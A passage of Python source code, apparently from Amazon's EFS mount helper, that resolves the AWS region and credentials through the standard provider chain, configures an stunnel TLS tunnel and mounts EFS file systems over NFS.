CREDENTIALS_KEYS = ['AccessKeyId', 'SecretAccessKey', 'Token']
ECS_URI_ENV = 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'
ECS_TASK_METADATA_API = 'http://169.254.170.2'
WEB_IDENTITY_ROLE_ARN_ENV = 'AWS_ROLE_ARN'
WEB_IDENTITY_TOKEN_FILE_ENV = 'AWS_WEB_IDENTITY_TOKEN_FILE'
STS_ENDPOINT_URL = 'https://sts.amazonaws.com/'
INSTANCE_METADATA_TOKEN_URL = 'http://169.254.169.254/latest/api/token'
INSTANCE_METADATA_SERVICE_URL = 'http://169.254.169.254/latest/dynamic/instance-identity/document/'
INSTANCE_IAM_URL = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
SECURITY_CREDS_ECS_URI_HELP_URL = 'https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html'
SECURITY_CREDS_WEBIDENTITY_HELP_URL = 'https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html'
SECURITY_CREDS_IAM_ROLE_HELP_URL = 'https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html'
DEFAULT_STUNNEL_VERIFY_LEVEL = 2
DEFAULT_STUNNEL_CAFILE = '/etc/amazon/efs/efs-utils.crt'
NOT_BEFORE_MINS = 15
NOT_AFTER_HOURS = 3
EFS_ONLY_OPTIONS = [
'accesspoint',
'awscredsuri',
'awsprofile',
'cafile',
'iam',
'netns',
'noocsp',
'ocsp',
'tls',
'tlsport',
'verify'
]
UNSUPPORTED_OPTIONS = [
'capath'
]
STUNNEL_GLOBAL_CONFIG = {
'fips': 'no',
'foreground': 'yes',
'socket': [
'l:SO_REUSEADDR=yes',
'a:SO_BINDTODEVICE=lo',
],
}
STUNNEL_EFS_CONFIG = {
'client': 'yes',
'accept': '127.0.0.1:%s',
'connect': '%s:2049',
'sslVersion': 'TLSv1.2',
'renegotiation': 'no',
'TIMEOUTbusy': '20',
'TIMEOUTclose': '0',
'TIMEOUTidle': '70',
'delay': 'yes',
}
WATCHDOG_SERVICE = 'amazon-efs-mount-watchdog'
SYSTEM_RELEASE_PATH = '/etc/system-release'
OS_RELEASE_PATH = '/etc/os-release'
RHEL8_RELEASE_NAME = 'Red Hat Enterprise Linux release 8'
CENTOS8_RELEASE_NAME = 'CentOS Linux release 8'
FEDORA_RELEASE_NAME = 'Fedora release'
SUSE_RELEASE_NAME = 'openSUSE Leap'
SKIP_NO_LIBWRAP_RELEASES = [RHEL8_RELEASE_NAME, CENTOS8_RELEASE_NAME, FEDORA_RELEASE_NAME, SUSE_RELEASE_NAME]
def fatal_error(user_message, log_message=None, exit_code=1):
if log_message is None:
log_message = user_message
sys.stderr.write('%s\n' % user_message)
logging.error(log_message)
publish_cloudwatch_log(CLOUDWATCHLOG_AGENT, 'Mount failed, %s' % log_message)
sys.exit(exit_code)
def get_target_region(config):
def _fatal_error(message):
fatal_error('Error retrieving region. Please set the "region" parameter in the efs-utils configuration file.', message)
metadata_exception = 'Unknown error'
try:
return config.get(CONFIG_SECTION, 'region')
except NoOptionError:
pass
try:
return get_region_from_instance_metadata()
except Exception as e:
metadata_exception = e
logging.warning('Region not found in config file and metadata service call failed, falling back '
'to legacy "dns_name_format" check')
try:
region = get_region_from_legacy_dns_format(config)
sys.stdout.write('Warning: region obtained from "dns_name_format" field. Please set the "region" '
'parameter in the efs-utils configuration file.')
return region
except Exception:
logging.warning('Legacy check for region in "dns_name_format" failed')
_fatal_error(metadata_exception)
def get_region_from_instance_metadata():
instance_identity = get_instance_identity_info_from_instance_metadata('region')
if not instance_identity:
raise Exception("Cannot retrieve region from instance_metadata")
return instance_identity
def get_instance_identity_info_from_instance_metadata(property):
ec2_metadata_unsuccessful_resp = 'Unsuccessful retrieval of EC2 metadata at %s.' % INSTANCE_METADATA_SERVICE_URL
ec2_metadata_url_error_msg = 'Unable to reach %s to retrieve EC2 instance metadata.' % INSTANCE_METADATA_SERVICE_URL
instance_identity = url_request_helper(INSTANCE_METADATA_SERVICE_URL, ec2_metadata_unsuccessful_resp,
ec2_metadata_url_error_msg, retry_with_new_header_token=True)
if instance_identity:
try:
return instance_identity[property]
except KeyError as e:
logging.warning('%s not present in %s: %s' % (property, instance_identity, e))
except TypeError as e:
logging.warning('response %s is not a json object: %s' % (instance_identity, e))
return None
def get_region_from_legacy_dns_format(config):
"""
For backwards compatibility check dns_name_format to obtain the target region. This functionality
should only be used if region is not present in the config file and metadata calls fail.
"""
dns_name_format = config.get(CONFIG_SECTION, 'dns_name_format')
if '{region}' not in dns_name_format:
split_dns_name_format = dns_name_format.split('.')
if '{dns_name_suffix}' in dns_name_format:
return split_dns_name_format[-2]
elif 'amazonaws.com' in dns_name_format:
return split_dns_name_format[-3]
raise Exception('Region not found in dns_name_format')
def get_aws_ec2_metadata_token():
try:
opener = build_opener(HTTPHandler)
request = Request(INSTANCE_METADATA_TOKEN_URL)
request.add_header('X-aws-ec2-metadata-token-ttl-seconds', 21600)
request.get_method = lambda: 'PUT'
res = opener.open(request)
return res.read()
except NameError:
headers = {'X-aws-ec2-metadata-token-ttl-seconds': 21600}
req = Request(INSTANCE_METADATA_TOKEN_URL, headers=headers, method='PUT')
res = urlopen(req)
return res.read()
def get_aws_security_credentials(use_iam, awsprofile=None, aws_creds_uri=None):
"""
Look up AWS security credentials (access key ID and secret access key). Adapted credentials provider chain from:
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html and
https://docs.aws.amazon.com/sdk-for-java/v1/developer-guide/credentials.html
"""
if not use_iam:
return None, None
# attempt to look up AWS security credentials through the credentials URI the ECS agent generated
if aws_creds_uri:
return get_aws_security_credentials_from_ecs(aws_creds_uri, True)
# attempt to look up AWS security credentials in the AWS credentials file (~/.aws/credentials)
# and config file (~/.aws/config) with the given awsprofile
if awsprofile:
return get_aws_security_credentials_from_awsprofile(awsprofile, True)
# attempt to look up AWS security credentials through the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI environment variable
if ECS_URI_ENV in os.environ:
credentials, credentials_source = get_aws_security_credentials_from_ecs(os.environ[ECS_URI_ENV], False)
if credentials and credentials_source:
return credentials, credentials_source
# attempt to look up AWS security credentials through AssumeRoleWithWebIdentity
# (e.g. for IAM Role for Service Accounts (IRSA) approach on EKS)
if WEB_IDENTITY_ROLE_ARN_ENV in os.environ and WEB_IDENTITY_TOKEN_FILE_ENV in os.environ:
credentials, credentials_source = get_aws_security_credentials_from_webidentity(
os.environ[WEB_IDENTITY_ROLE_ARN_ENV],
os.environ[WEB_IDENTITY_TOKEN_FILE_ENV],
False
)
if credentials and credentials_source:
return credentials, credentials_source
# attempt to look up AWS security credentials using the IAM role name attached to the instance
# through the IAM role name security credentials lookup URI
iam_role_name = get_iam_role_name()
if iam_role_name:
credentials, credentials_source = get_aws_security_credentials_from_instance_metadata(iam_role_name)
if credentials and credentials_source:
return credentials, credentials_source
error_msg = 'AWS Access Key ID and Secret Access Key are not found in AWS credentials file (%s), config file (%s), ' \
'from ECS credentials relative uri, or from the instance security credentials service' % \
(AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE)
fatal_error(error_msg, error_msg)
def get_aws_security_credentials_from_awsprofile(awsprofile, is_fatal=False):
for file_path in [AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE]:
if os.path.exists(file_path):
credentials = credentials_file_helper(file_path, awsprofile)
if credentials['AccessKeyId']:
return credentials, os.path.basename(file_path) + ':' + awsprofile
# Fail if credentials cannot be fetched from the given awsprofile
if is_fatal:
log_message = 'AWS security credentials not found in %s or %s under named profile [%s]' % \
(AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE, awsprofile)
fatal_error(log_message)
else:
return None, None
def get_aws_security_credentials_from_ecs(aws_creds_uri, is_fatal=False):
ecs_uri = ECS_TASK_METADATA_API + aws_creds_uri
ecs_unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % ecs_uri
ecs_url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' \
% (ecs_uri, SECURITY_CREDS_ECS_URI_HELP_URL)
ecs_security_dict = url_request_helper(ecs_uri, ecs_unsuccessful_resp, ecs_url_error_msg)
if ecs_security_dict and all(k in ecs_security_dict for k in CREDENTIALS_KEYS):
return ecs_security_dict, 'ecs:' + aws_creds_uri
# Fail if credentials cannot be fetched from the given aws_creds_uri
if is_fatal:
fatal_error(ecs_unsuccessful_resp, ecs_unsuccessful_resp)
else:
return None, None
def get_aws_security_credentials_from_webidentity(role_arn, token_file, is_fatal=False):
try:
with open(token_file, 'r') as f:
token = f.read()
except Exception as e:
if is_fatal:
unsuccessful_resp = 'Error reading token file %s: %s' % (token_file, e)
fatal_error(unsuccessful_resp, unsuccessful_resp)
else:
return None, None
webidentity_url = STS_ENDPOINT_URL + '?' + urlencode({
'Version': '2011-06-15',
'Action': 'AssumeRoleWithWebIdentity',
'RoleArn': role_arn,
'RoleSessionName': 'efs-mount-helper',
'WebIdentityToken': token
})
unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % STS_ENDPOINT_URL
url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' % \
(STS_ENDPOINT_URL, SECURITY_CREDS_WEBIDENTITY_HELP_URL)
resp = url_request_helper(webidentity_url, unsuccessful_resp, url_error_msg, headers={'Accept': 'application/json'})
if resp:
creds = resp \
.get('AssumeRoleWithWebIdentityResponse', {}) \
.get('AssumeRoleWithWebIdentityResult', {}) \
.get('Credentials', {})
if all(k in creds for k in ['AccessKeyId', 'SecretAccessKey', 'SessionToken']):
return {
'AccessKeyId': creds['AccessKeyId'],
'SecretAccessKey': creds['SecretAccessKey'],
'Token': creds['SessionToken']
}, 'webidentity:' + ','.join([role_arn, token_file])
# Fail if credentials cannot be fetched with the given role_arn and token_file
if is_fatal:
fatal_error(unsuccessful_resp, unsuccessful_resp)
else:
return None, None
def get_aws_security_credentials_from_instance_metadata(iam_role_name):
security_creds_lookup_url = INSTANCE_IAM_URL + iam_role_name
unsuccessful_resp = 'Unsuccessful retrieval of AWS security credentials at %s.' % security_creds_lookup_url
url_error_msg = 'Unable to reach %s to retrieve AWS security credentials. See %s for more info.' % \
(security_creds_lookup_url, SECURITY_CREDS_IAM_ROLE_HELP_URL)
iam_security_dict = url_request_helper(security_creds_lookup_url, unsuccessful_resp,
url_error_msg, retry_with_new_header_token=True)
if iam_security_dict and all(k in iam_security_dict for k in CREDENTIALS_KEYS):
return iam_security_dict, 'metadata:'
else:
return None, None
def get_iam_role_name():
iam_role_unsuccessful_resp = 'Unsuccessful retrieval of IAM role name at %s.' % INSTANCE_IAM_URL
iam_role_url_error_msg = 'Unable to reach %s to retrieve IAM role name. See %s for more info.' % \
(INSTANCE_IAM_URL, SECURITY_CREDS_IAM_ROLE_HELP_URL)
iam_role_name = url_request_helper(INSTANCE_IAM_URL, iam_role_unsuccessful_resp,
iam_role_url_error_msg, retry_with_new_header_token=True)
return iam_role_name
def credentials_file_helper(file_path, awsprofile):
aws_credentials_configs = read_config(file_path)
credentials = {'AccessKeyId': None, 'SecretAccessKey': None, 'Token': None}
try:
access_key = aws_credentials_configs.get(awsprofile, 'aws_access_key_id')
secret_key = aws_credentials_configs.get(awsprofile, 'aws_secret_access_key')
session_token = aws_credentials_configs.get(awsprofile, 'aws_session_token')
credentials['AccessKeyId'] = access_key
credentials['SecretAccessKey'] = secret_key
credentials['Token'] = session_token
except NoOptionError as e:
if 'aws_access_key_id' in str(e) or 'aws_secret_access_key' in str(e):
logging.debug('aws_access_key_id or aws_secret_access_key not found in %s under named profile [%s]', file_path,
awsprofile)
if 'aws_session_token' in str(e):
logging.debug('aws_session_token not found in %s', file_path)
credentials['AccessKeyId'] = aws_credentials_configs.get(awsprofile, 'aws_access_key_id')
credentials['SecretAccessKey'] = aws_credentials_configs.get(awsprofile, 'aws_secret_access_key')
except NoSectionError:
logging.debug('No [%s] section found in config file %s', awsprofile, file_path)
return credentials
def get_aws_profile(options, use_iam):
awsprofile = options.get('awsprofile')
if not awsprofile and use_iam:
for file_path in [AWS_CREDENTIALS_FILE, AWS_CONFIG_FILE]:
aws_credentials_configs = read_config(file_path)
# check if aws access key id is found under [default] section in current file and return 'default' if so
try:
access_key = aws_credentials_configs.get('default', 'aws_access_key_id')
if access_key is not None:
return 'default'
except (NoSectionError, NoOptionError):
continue
return awsprofile
def url_request_helper(url, unsuccessful_resp, url_error_msg, headers={}, retry_with_new_header_token=False):
try:
req = Request(url)
for k, v in headers.items():
req.add_header(k, v)
request_resp = urlopen(req, timeout=1)
return get_resp_obj(request_resp, url, unsuccessful_resp)
except HTTPError as e:
# For instances with IMDSv2 enabled, an Unauthorized 401 error will be thrown;
# to retrieve metadata, the request header must include the metadata token
if e.code == 401 and retry_with_new_header_token:
token = get_aws_ec2_metadata_token()
req.add_header('X-aws-ec2-metadata-token', token)
request_resp = urlopen(req, timeout=1)
return get_resp_obj(request_resp, url, unsuccessful_resp)
err_msg = 'Unable to reach the url at %s: status=%d, reason is %s' % (url, e.code, e.reason)
except URLError as e:
err_msg = 'Unable to reach the url at %s, reason is %s' % (url, e.reason)
if err_msg:
logging.debug('%s %s', url_error_msg, err_msg)
return None
def get_resp_obj(request_resp, url, unsuccessful_resp):
if request_resp.getcode() != 200:
logging.debug(unsuccessful_resp + ' %s: ResponseCode=%d', url, request_resp.getcode())
return None
resp_body = request_resp.read()
resp_body_type = type(resp_body)
try:
if resp_body_type is str:
resp_dict = json.loads(resp_body)
else:
resp_dict = json.loads(resp_body.decode(request_resp.headers.get_content_charset() or 'us-ascii'))
return resp_dict
except ValueError as e:
logging.info('ValueError parsing "%s" into json: %s. Returning response body.' % (str(resp_body), e))
return resp_body if resp_body_type is str else resp_body.decode('utf-8')
def parse_options(options):
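# e.g. 'tls,tlsport=20049,iam' -> {'tls': None, 'tlsport': '20049', 'iam': None}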
opts = {}
for o in options.split(','):
if '=' in o:
k, v = o.split('=')
opts[k] = v
else:
opts[o] = None
return opts
def get_tls_port_range(config):
lower_bound = config.getint(CONFIG_SECTION, 'port_range_lower_bound')
upper_bound = config.getint(CONFIG_SECTION, 'port_range_upper_bound')
if lower_bound >= upper_bound:
fatal_error('Configuration option "port_range_upper_bound" defined as %d '
'must be strictly greater than "port_range_lower_bound" defined as %d.'
% (upper_bound, lower_bound))
return lower_bound, upper_bound
def choose_tls_port(config, options):
if 'tlsport' in options:
ports_to_try = [int(options['tlsport'])]
else:
lower_bound, upper_bound = get_tls_port_range(config)
tls_ports = list(range(lower_bound, upper_bound))
# Choose a random midpoint, and then try ports in-order from there
mid = random.randrange(len(tls_ports))
ports_to_try = tls_ports[mid:] + tls_ports[:mid]
assert len(tls_ports) == len(ports_to_try)
sock = socket.socket()
for tls_port in ports_to_try:
try:
sock.bind(('localhost', tls_port))
sock.close()
return tls_port
except socket.error:
continue
sock.close()
if 'tlsport' in options:
fatal_error('Specified port [%s] is unavailable. Try selecting a different port.' % options['tlsport'])
else:
fatal_error('Failed to locate an available port in the range [%d, %d], try specifying a different port range in %s'
% (lower_bound, upper_bound, CONFIG_FILE))
def is_ocsp_enabled(config, options):
if 'ocsp' in options:
return True
elif 'noocsp' in options:
return False
else:
return config.getboolean(CONFIG_SECTION, 'stunnel_check_cert_validity')
def get_mount_specific_filename(fs_id, mountpoint, tls_port):
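# e.g. ('fs-deadbeef', '/mnt/efs', 20049) -> 'fs-deadbeef.mnt.efs.20049'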
return '%s.%s.%d' % (fs_id, os.path.abspath(mountpoint).replace(os.sep, '.').lstrip('.'), tls_port)
def serialize_stunnel_config(config, header=None):
lines = []
if header:
lines.append('[%s]' % header)
for k, v in config.items():
if type(v) is list:
for item in v:
lines.append('%s = %s' % (k, item))
else:
lines.append('%s = %s' % (k, v))
return lines
def add_stunnel_ca_options(efs_config, config, options):
if 'cafile' in options:
stunnel_cafile = options['cafile']
else:
try:
stunnel_cafile = config.get(CONFIG_SECTION, 'stunnel_cafile')
except NoOptionError:
logging.debug('No CA file configured, using default CA file %s', DEFAULT_STUNNEL_CAFILE)
stunnel_cafile = DEFAULT_STUNNEL_CAFILE
if not os.path.exists(stunnel_cafile):
fatal_error('Failed to find certificate authority file for verification',
'Failed to find CAfile "%s"' % stunnel_cafile)
efs_config['CAfile'] = stunnel_cafile
def is_stunnel_option_supported(stunnel_output, stunnel_option_name):
supported = False
for line in stunnel_output:
if line.startswith(stunnel_option_name):
supported = True
break
if not supported:
logging.warning('stunnel does not support "%s"', stunnel_option_name)
return supported
def get_version_specific_stunnel_options():
stunnel_command = [_stunnel_bin(), '-help']
proc = subprocess.Popen(stunnel_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
proc.wait()
_, err = proc.communicate()
stunnel_output = err.splitlines()
check_host_supported = is_stunnel_option_supported(stunnel_output, b'checkHost')
ocsp_aia_supported = is_stunnel_option_supported(stunnel_output, b'OCSPaia')
return check_host_supported, ocsp_aia_supported
def _stunnel_bin():
return find_command_path('stunnel',
'Please install it following the instructions at '
'https://docs.aws.amazon.com/efs/latest/ug/using-amazon-efs-utils.html#upgrading-stunnel')
def find_command_path(command, install_method):
try:
env_path = '/sbin:/usr/sbin:/usr/local/sbin:/root/bin:/usr/local/bin:/usr/bin:/bin'
os.putenv('PATH', env_path)
path = subprocess.check_output(['which', command])
except subprocess.CalledProcessError as e:
fatal_error('Failed to locate %s in %s - %s' % (command, env_path, install_method), e)
return path.strip().decode()
def get_system_release_version():
try:
with open(SYSTEM_RELEASE_PATH) as f:
return f.read().strip()
except IOError:
logging.debug('Unable to read %s', SYSTEM_RELEASE_PATH)
try:
with open(OS_RELEASE_PATH) as f:
for line in f:
if 'PRETTY_NAME' in line:
return line.split('=')[1].strip()
except IOError:
logging.debug('Unable to read %s', OS_RELEASE_PATH)
return 'unknown'
def write_stunnel_config_file(config, state_file_dir, fs_id, mountpoint, tls_port, dns_name, verify_level, ocsp_enabled,
options, log_dir=LOG_DIR, cert_details=None):
"""
Serializes stunnel configuration to a file. Unfortunately this does not conform to Python's config file format, so we have to
hand-serialize it.
"""
mount_filename = get_mount_specific_filename(fs_id, mountpoint, tls_port)
global_config = dict(STUNNEL_GLOBAL_CONFIG)
if config.getboolean(CONFIG_SECTION, 'stunnel_debug_enabled'):
global_config['debug'] = 'debug'
if config.has_option(CONFIG_SECTION, 'stunnel_logs_file'):
global_config['output'] = config.get(CONFIG_SECTION, 'stunnel_logs_file').replace('{fs_id}', fs_id)
else:
global_config['output'] = os.path.join(log_dir, '%s.stunnel.log' % mount_filename)
efs_config = dict(STUNNEL_EFS_CONFIG)
efs_config['accept'] = efs_config['accept'] % tls_port
efs_config['connect'] = efs_config['connect'] % dns_name
efs_config['verify'] = verify_level
if verify_level > 0:
add_stunnel_ca_options(efs_config, config, options)
if cert_details:
efs_config['cert'] = cert_details['certificate']
efs_config['key'] = cert_details['privateKey']
check_host_supported, ocsp_aia_supported = get_version_specific_stunnel_options()
tls_controls_message = 'WARNING: Your client lacks sufficient controls to properly enforce TLS. Please upgrade stunnel, ' \
'or disable "%%s" in %s.\nSee %s for more detail.' % (CONFIG_FILE,
'https://docs.aws.amazon.com/console/efs/troubleshooting-tls')
if config.getboolean(CONFIG_SECTION, 'stunnel_check_cert_hostname'):
if check_host_supported:
efs_config['checkHost'] = dns_name
else:
fatal_error(tls_controls_message % 'stunnel_check_cert_hostname')
# Only use the config setting if the override is not set
if ocsp_enabled:
if ocsp_aia_supported:
efs_config['OCSPaia'] = 'yes'
else:
fatal_error(tls_controls_message % 'stunnel_check_cert_validity')
system_release_version = get_system_release_version()
if not any(release in system_release_version for release in SKIP_NO_LIBWRAP_RELEASES):
efs_config['libwrap'] = 'no'
stunnel_config = '\n'.join(serialize_stunnel_config(global_config) + serialize_stunnel_config(efs_config, 'efs'))
logging.debug('Writing stunnel configuration:\n%s', stunnel_config)
stunnel_config_file = os.path.join(state_file_dir, 'stunnel-config.%s' % mount_filename)
with open(stunnel_config_file, 'w') as f:
f.write(stunnel_config)
return stunnel_config_file
def write_tls_tunnel_state_file(fs_id, mountpoint, tls_port, tunnel_pid, command, files, state_file_dir, cert_details=None):
"""
Return the name of the temporary file containing TLS tunnel state, prefixed with a '~'. This file needs to be renamed to a
non-temporary version following a successful mount.
"""
state_file = '~' + get_mount_specific_filename(fs_id, mountpoint, tls_port)
state = {
'pid': tunnel_pid,
'cmd': command,
'files': files,
}
if cert_details:
state.update(cert_details)
with open(os.path.join(state_file_dir, state_file), 'w') as f:
json.dump(state, f)
return state_file
def test_tunnel_process(tunnel_proc, fs_id):
tunnel_proc.poll()
if tunnel_proc.returncode is not None:
out, err = tunnel_proc.communicate()
fatal_error('Failed to initialize TLS tunnel for %s' % fs_id,
'Failed to start TLS tunnel (errno=%d). stdout="%s" stderr="%s"'
% (tunnel_proc.returncode, out.strip(), err.strip()))
def poll_tunnel_process(tunnel_proc, fs_id, mount_completed):
"""
Poll the tunnel process health every 0.5s during the mount attempt to fail fast if the tunnel dies. Since this is not
called from the main thread, exit uncleanly with os._exit if the tunnel fails.
"""
while not mount_completed.is_set():
try:
test_tunnel_process(tunnel_proc, fs_id)
except SystemExit as e:
os._exit(e.code)
mount_completed.wait(.5)
def get_init_system(comm_file='/proc/1/comm'):
init_system = 'unknown'
try:
with open(comm_file) as f:
init_system = f.read().strip()
except IOError:
logging.warning('Unable to read %s', comm_file)
logging.debug('Identified init system: %s', init_system)
return init_system
def check_network_target(fs_id):
with open(os.devnull, 'w') as devnull:
rc = subprocess.call(['systemctl', 'status', 'network.target'], stdout=devnull, stderr=devnull, close_fds=True)
if rc != 0:
fatal_error('Failed to mount %s because the network was not yet available, add "_netdev" to your mount options' % fs_id,
exit_code=0)
def check_network_status(fs_id, init_system):
if init_system != 'systemd':
logging.debug('Not testing network on non-systemd init systems')
return
check_network_target(fs_id)
def start_watchdog(init_system):
if init_system == 'init':
proc = subprocess.Popen(
['/sbin/status', WATCHDOG_SERVICE], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
status, _ = proc.communicate()
if 'stop' in status:
with open(os.devnull, 'w') as devnull:
subprocess.Popen(['/sbin/start', WATCHDOG_SERVICE], stdout=devnull, stderr=devnull, close_fds=True)
elif 'start' in status:
logging.debug('%s is already running', WATCHDOG_SERVICE)
elif init_system == 'systemd':
rc = subprocess.call(['systemctl', 'is-active', '--quiet', WATCHDOG_SERVICE], close_fds=True)
if rc != 0:
with open(os.devnull, 'w') as devnull:
subprocess.Popen(['systemctl', 'start', WATCHDOG_SERVICE], stdout=devnull, stderr=devnull, close_fds=True)
else:
logging.debug('%s is already running', WATCHDOG_SERVICE)
else:
error_message = 'Could not start %s, unrecognized init system "%s"' % (WATCHDOG_SERVICE, init_system)
sys.stderr.write('%s\n' % error_message)
logging.warning(error_message)
def create_required_directory(config, directory):
mode = 0o750
try:
mode_str = config.get(CONFIG_SECTION, 'state_file_dir_mode')
try:
mode = int(mode_str, 8)
except ValueError:
logging.warning('Bad state_file_dir_mode "%s" in config file "%s"', mode_str, CONFIG_FILE)
except NoOptionError:
pass
try:
os.makedirs(directory, mode)
except OSError as e:
if errno.EEXIST != e.errno or not os.path.isdir(directory):
raise
@contextmanager
def bootstrap_tls(config, init_system, dns_name, fs_id, mountpoint, options, state_file_dir=STATE_FILE_DIR):
tls_port = choose_tls_port(config, options)
# Override the tlsport option so that we can later override the port the NFS client uses to connect to stunnel;
# if the user specified tlsport=X on the command line, this simply re-sets tlsport to X.
options['tlsport'] = tls_port
use_iam = 'iam' in options
ap_id = options.get('accesspoint')
cert_details = {}
security_credentials = None
client_info = get_client_info(config)
if use_iam:
aws_creds_uri = options.get('awscredsuri')
if aws_creds_uri:
kwargs = {'aws_creds_uri': aws_creds_uri}
else:
kwargs = {'awsprofile': get_aws_profile(options, use_iam)}
security_credentials, credentials_source = get_aws_security_credentials(use_iam, **kwargs)
if credentials_source:
cert_details['awsCredentialsMethod'] = credentials_source
if ap_id:
cert_details['accessPoint'] = ap_id
# additional symbol appended to avoid naming collisions
cert_details['mountStateDir'] = get_mount_specific_filename(fs_id, mountpoint, tls_port) + '+'
# common name for certificate signing request is max 64 characters
cert_details['commonName'] = socket.gethostname()[0:64]
cert_details['region'] = get_target_region(config)
cert_details['certificateCreationTime'] = create_certificate(config, cert_details['mountStateDir'],
cert_details['commonName'], cert_details['region'], fs_id,
security_credentials, ap_id, client_info,
base_path=state_file_dir)
cert_details['certificate'] = os.path.join(state_file_dir, cert_details['mountStateDir'], 'certificate.pem')
cert_details['privateKey'] = get_private_key_path()
cert_details['fsId'] = fs_id
start_watchdog(init_system)
if not os.path.exists(state_file_dir):
create_required_directory(config, state_file_dir)
verify_level = int(options.get('verify', DEFAULT_STUNNEL_VERIFY_LEVEL))
ocsp_enabled = is_ocsp_enabled(config, options)
stunnel_config_file = write_stunnel_config_file(config, state_file_dir, fs_id, mountpoint, tls_port, dns_name, verify_level,
ocsp_enabled, options, cert_details=cert_details)
tunnel_args = [_stunnel_bin(), stunnel_config_file]
if 'netns' in options:
tunnel_args = ['nsenter', '--net=' + options['netns']] + tunnel_args
# launch the tunnel in a process group so if it has any child processes, they can be killed easily by the mount watchdog
logging.info('Starting TLS tunnel: "%s"', ' '.join(tunnel_args))
tunnel_proc = subprocess.Popen(
tunnel_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setsid, close_fds=True)
logging.info('Started TLS tunnel, pid: %d', tunnel_proc.pid)
temp_tls_state_file = write_tls_tunnel_state_file(fs_id, mountpoint, tls_port, tunnel_proc.pid, tunnel_args,
[stunnel_config_file], state_file_dir, cert_details=cert_details)
try:
yield tunnel_proc
finally:
os.rename(os.path.join(state_file_dir, temp_tls_state_file), os.path.join(state_file_dir, temp_tls_state_file[1:]))
def get_nfs_mount_options(options):
# If you change these options, update the man page as well at man/mount.efs.8
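# With no user-supplied overrides, the defaults below typically yield an option string such as
# 'nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport'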
if 'nfsvers' not in options and 'vers' not in options:
options['nfsvers'] = '4.1'
if 'rsize' not in options:
options['rsize'] = '1048576'
if 'wsize' not in options:
options['wsize'] = '1048576'
if 'soft' not in options and 'hard' not in options:
options['hard'] = None
if 'timeo' not in options:
options['timeo'] = '600'
if 'retrans' not in options:
options['retrans'] = '2'
if 'noresvport' not in options:
options['noresvport'] = None
if 'tls' in options:
options['port'] = options['tlsport']
def to_nfs_option(k, v):
if v is None:
return k
return '%s=%s' % (str(k), str(v))
nfs_options = [to_nfs_option(k, v) for k, v in options.items() if k not in EFS_ONLY_OPTIONS]
return ','.join(nfs_options)
def mount_nfs(dns_name, path, mountpoint, options):
if 'tls' in options:
mount_path = '127.0.0.1:%s' % path
else:
mount_path = '%s:%s' % (dns_name, path)
command = ['/sbin/mount.nfs4', mount_path, mountpoint, '-o', get_nfs_mount_options(options)]
if 'netns' in options:
command = ['nsenter', '--net=' + options['netns']] + command
logging.info('Executing: "%s"', ' '.join(command))
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
out, err = proc.communicate()
if proc.returncode == 0:
message = 'Successfully mounted %s at %s' % (dns_name, mountpoint)
logging.info(message)
publish_cloudwatch_log(CLOUDWATCHLOG_AGENT, message)
else:
message = 'Failed to mount %s at %s: returncode=%d, stderr="%s"' % (dns_name, mountpoint, proc.returncode, err.strip())
fatal_error(err.strip(), message, proc.returncode)
def usage(out, exit_code=1):
out.write('Usage: mount.efs [--version] [-h|--help] <fsname> <mountpoint> [-o <options>]\n')
sys.exit(exit_code)
def parse_arguments_early_exit(args=None):
"""Parse arguments, checking for early exit conditions only"""
if args is None:
args = sys.argv
if '-h' in args[1:] or '--help' in args[1:]:
usage(out=sys.stdout, exit_code=0)
if '--version' in args[1:]:
sys.stdout.write('%s Version: %s\n' % (args[0], VERSION))
sys.exit(0)
def parse_arguments(config, args=None):
"""Parse arguments, return (fsid, path, mountpoint, options)"""
if args is None:
args = sys.argv
fsname = None
mountpoint = None
options = {}
if len(args) > 1:
fsname = args[1]
if len(args) > 2:
mountpoint = args[2]
if len(args) > 4 and '-o' in args[:-1]:
options_index = args.index('-o') + 1
options = parse_options(args[options_index])
if not fsname or not mountpoint:
usage(out=sys.stderr)
fs_id, path = match_device(config, fsname)
return fs_id, path, mountpoint, options
def get_client_info(config):
client_info = {}
# source key/value pair in config file
if config.has_option(CLIENT_INFO_SECTION, 'source'):
client_source = config.get(CLIENT_INFO_SECTION, 'source')
if 0 < len(client_source) <= CLIENT_SOURCE_STR_LEN_LIMIT:
client_info['source'] = client_source
return client_info
def create_certificate(config, mount_name, common_name, region, fs_id, security_credentials, ap_id, client_info,
base_path=STATE_FILE_DIR):
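# Build a short-lived self-signed client certificate that carries the IAM signature and/or
# access point id to EFS over TLS: prepare the CA directory layout, ensure the shared private
# key exists, write the openssl config, create a CSR and self-sign it.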
current_time = get_utc_now()
tls_paths = tls_paths_dictionary(mount_name, base_path)
certificate_config = os.path.join(tls_paths['mount_dir'], 'config.conf')
certificate_signing_request = os.path.join(tls_paths['mount_dir'], 'request.csr')
certificate = os.path.join(tls_paths['mount_dir'], 'certificate.pem')
ca_dirs_check(config, tls_paths['database_dir'], tls_paths['certs_dir'])
ca_supporting_files_check(tls_paths['index'], tls_paths['index_attr'], tls_paths['serial'], tls_paths['rand'])
private_key = check_and_create_private_key(base_path)
if security_credentials:
public_key = os.path.join(tls_paths['mount_dir'], 'publicKey.pem')
create_public_key(private_key, public_key)
create_ca_conf(certificate_config, common_name, tls_paths['mount_dir'], private_key, current_time, region, fs_id,
security_credentials, ap_id, client_info)
